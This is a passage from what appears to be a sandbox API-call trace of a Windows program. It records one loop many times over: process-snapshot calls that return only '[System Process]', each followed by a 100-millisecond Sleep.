th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.082] Sleep (dwMilliseconds=0x64) [0205.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0205.101] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.180] Sleep (dwMilliseconds=0x64) [0205.184] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0205.195] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.274] Sleep (dwMilliseconds=0x64) [0205.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0205.289] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.364] Sleep (dwMilliseconds=0x64) [0205.374] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0205.385] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.460] Sleep (dwMilliseconds=0x64) [0205.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0205.475] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.552] Sleep (dwMilliseconds=0x64) [0205.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0205.573] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.630] Sleep (dwMilliseconds=0x64) [0205.638] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0205.648] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.706] Sleep (dwMilliseconds=0x64) [0205.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0205.726] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.808] Sleep (dwMilliseconds=0x64) [0205.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0205.845] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.963] Sleep (dwMilliseconds=0x64) [0206.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0206.029] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.103] Sleep (dwMilliseconds=0x64) [0206.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0206.127] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.197] Sleep (dwMilliseconds=0x64) [0206.244] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0206.266] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.339] Sleep (dwMilliseconds=0x64) [0206.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0206.370] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.426] Sleep (dwMilliseconds=0x64) [0206.434] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0206.445] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.504] Sleep (dwMilliseconds=0x64) [0206.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0206.522] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.581] Sleep (dwMilliseconds=0x64) [0206.591] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0206.601] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.659] Sleep (dwMilliseconds=0x64) [0206.669] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0206.680] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.741] Sleep (dwMilliseconds=0x64) [0206.746] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0206.756] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.822] Sleep (dwMilliseconds=0x64) [0206.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0206.836] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.965] Sleep (dwMilliseconds=0x64) [0206.984] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0207.000] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.068] Sleep (dwMilliseconds=0x64) [0207.075] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0207.086] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.169] Sleep (dwMilliseconds=0x64) [0207.187] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0207.197] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.269] Sleep (dwMilliseconds=0x64) [0207.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0207.299] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.377] Sleep (dwMilliseconds=0x64) [0207.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0207.408] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.477] Sleep (dwMilliseconds=0x64) [0207.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0207.493] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.564] Sleep (dwMilliseconds=0x64) [0207.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0207.587] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.659] Sleep (dwMilliseconds=0x64) [0207.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0207.688] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.754] Sleep (dwMilliseconds=0x64) [0207.767] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0207.783] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.002] Sleep (dwMilliseconds=0x64) [0208.093] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0208.105] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.293] Sleep (dwMilliseconds=0x64) [0208.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0208.523] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.606] Sleep (dwMilliseconds=0x64) [0208.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0208.635] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.707] Sleep (dwMilliseconds=0x64) [0208.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0208.726] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.799] Sleep (dwMilliseconds=0x64) [0208.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0208.824] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.922] Sleep (dwMilliseconds=0x64) [0208.942] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0208.952] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.021] Sleep (dwMilliseconds=0x64) [0209.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0209.041] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.122] Sleep (dwMilliseconds=0x64) [0209.141] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0209.151] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.224] Sleep (dwMilliseconds=0x64) [0209.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0209.242] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.317] Sleep (dwMilliseconds=0x64) [0209.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0209.344] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.544] Sleep (dwMilliseconds=0x64) [0209.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0209.571] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.692] Sleep (dwMilliseconds=0x64) [0209.700] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0209.712] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.808] Sleep (dwMilliseconds=0x64) [0209.942] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0209.956] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.056] Sleep (dwMilliseconds=0x64) [0210.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0210.081] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.159] Sleep (dwMilliseconds=0x64) [0210.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0210.184] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.252] Sleep (dwMilliseconds=0x64) [0210.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0210.273] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.330] Sleep (dwMilliseconds=0x64) [0210.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0210.351] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.409] Sleep (dwMilliseconds=0x64) [0210.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0210.428] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.483] Sleep (dwMilliseconds=0x64) [0210.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0210.510] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.573] Sleep (dwMilliseconds=0x64) [0210.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0210.584] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.648] Sleep (dwMilliseconds=0x64) [0210.652] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0210.662] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.720] Sleep (dwMilliseconds=0x64) [0210.732] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0210.741] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.026] Sleep (dwMilliseconds=0x64) [0211.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0211.068] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.147] Sleep (dwMilliseconds=0x64) [0211.152] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0211.163] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.238] Sleep (dwMilliseconds=0x64) [0211.248] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0211.261] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.383] Sleep (dwMilliseconds=0x64) [0211.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0211.411] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.507] Sleep (dwMilliseconds=0x64) [0211.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0211.527] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.597] Sleep (dwMilliseconds=0x64) [0211.606] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0211.617] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.675] Sleep (dwMilliseconds=0x64) [0211.684] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0211.693] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.747] Sleep (dwMilliseconds=0x64) [0211.764] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0211.774] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.831] Sleep (dwMilliseconds=0x64) [0211.840] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0211.851] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.933] Sleep (dwMilliseconds=0x64) [0211.954] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0211.964] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, 